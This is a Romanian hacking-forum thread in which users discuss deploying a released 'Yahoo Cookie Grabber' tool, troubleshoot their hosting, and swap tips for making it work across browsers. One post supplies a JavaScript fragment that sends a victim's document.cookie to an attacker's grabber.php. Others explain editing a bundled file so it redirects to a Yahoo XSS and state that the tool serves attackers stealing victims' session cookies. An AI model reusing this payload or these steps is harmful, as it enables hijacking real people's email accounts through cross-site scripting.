Jump to content
Guest Nemessis

[RST] Professional Yahoo Cookie Grabber [de actualitate]

Recommended Posts

dupa o zi de release si deja nu va mai sufar cu intrebarile si posturile idioate ... parerea mea e ca mai bine nu il lansam si gata

Eu zic ca a fost demonstratie a nivelului de cunostinte ale userilor care trec pe aici , si aici ma refer la cei care intreaba cum fac ,da unde , avand n tutoriale pe tema asta chiar aici pe forum . Si eu ma simt un pic aiurea citind posturile astea ,dapai voi care ati codat si ati muncit pentru el . ma rog ,nu vreau sa par prea melodramatic :)

Fratilor am facut exact ca in tutorial am unploadat pe un host (evonet)asa cand sa rulez imi apare doar header-ul care duce spre rtszone.org, in rest nimic VA ROG SA IMI ZICA CINEVA DE CE ?

sincer acuma , tu ai facut un trojan si te vrei cat de cat programator , si nu esti in stare sa-i dai de cap unui script php avand si un tutorial in fata . ma intreb asa . Nu raspunde ca nu vreau sa facem offtopicuri ,da astfel de intrebari scad mult nivelul forumului .

Link to comment
Share on other sites

Guest Nemessis

Functioneaza perfect pe orice browser. Daca tu folosesti un hosting de cacao care nu accepta unele scripturi php nu e vina noastra.

Testat pe IE6, Firefox, Safari. Cu siguranta functioneaza pe Opera si IE7.

Link to comment
Share on other sites

Guest BanKai

a da si daca folositzi 'grabber.php?cookie='+escape(document.cookie) incercatzi si sa folositzi 'grabber.php?cookie='+document.cookie sau invers daca folositi fara escape incercati cu escape ... anumite hosturi tind sa interpreteze altfel aceste functii din cauza setarilor php ... vetzi fi uimitzi de rezultat ...

Link to comment
Share on other sites

nu merge frate nush daca am sters ce trebuia ca nush care anume referer

am umblat in google_adsense.php am sters prima parte din cod apoi am puso pe aia postata de tine am schimbat iar cu situ meu aia ... am bagat pe alt host tot nu merge daca a mai avut cineva problema asta si a rezolvata astept un pm PLS va rog

Link to comment
Share on other sites

Guest Nemessis

Daca ai citi topicul de acolo ai vedea ca a pus zbeng screenshots despre cum trebuie facut. Cap coada. Deja totul e pe RST. Trebuie sa modificati cateva litere din 3 fisiere mari si late si sa le faceti upload. Ce dracu e asa de greu?

Link to comment
Share on other sites

Guest BanKai
Nemessis nu mi merge pe ie 7 ... de ce? merge pe mozilla...dar pe ie7 nu .... cred ca mi blocheaza ceva automat si nu mai incarca xss ul ... ma ajuti ??

atentzie la google_ads shtergetzi ifurile si acoladele sa ramana doar header location XSS DE YAHOO

ATAT

Link to comment
Share on other sites

Nemessis nu mi merge pe ie 7 ... de ce? merge pe mozilla...dar pe ie7 nu .... cred ca mi blocheaza ceva automat si nu mai incarca xss ul ... ma ajuti ??

atentzie la google_ads shtergetzi ifurile si acoladele sa ramana doar header location XSS DE YAHOO

ATAT

daca tot ne explici aici ... nu iti faci pomana si cu niste nepriceputi ...sunt multi care asteptau sa pun eu intrebarea asta...

posteaza u ..mura n gura ... binenteles daca se poate...daca nu ...tot respectul oricum ...ati facut o treaba buna...si deja ati oferit prea mult....

bafta.... sunt cam beat ...am petrecut pt prietena...sorry daca am zis ceva anapoda....

Link to comment
Share on other sites

Guest Nemessis

nike, citeste ce s-a discutat. Nu esti primul care intreaba si deja s-a raspuns la nelamuririle tale. Citeste tot ce s-a postat in topicul asta, inclusiv linkurile puse de mine sau alti useri. Revino cu intrebari doar dupa ce ai incercat tot ce s-a scris mai inainte. End of discussion.

Link to comment
Share on other sites

Guest BanKai

pentru totzi cei care pun intrebari CITITZI CU ATENTZIE :

ACEST TOOL ESTE FACUT PENTRU CEI DEJA FAMILIARIZATI CU XSS SI ATACURI XSS IN SPECIAL DE YAHOO. ACEST TOOL NU ESTE UN TOOL DE GENUL CLICK SI AI COOKIEUL VICTIMEI CI ESTE DOAR UN TOOL CARE II VA FACE MUNCA USOARA ATACATORULUI PRIN DECODAREA DE COOKIE SI LINKURI UTILE.

CONCLUZIE : NU STITI CE INSEAMNA XSS SAU SA LANSATI ATACURI XSS ACEST TOOL NU VA ESTE UTIL.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...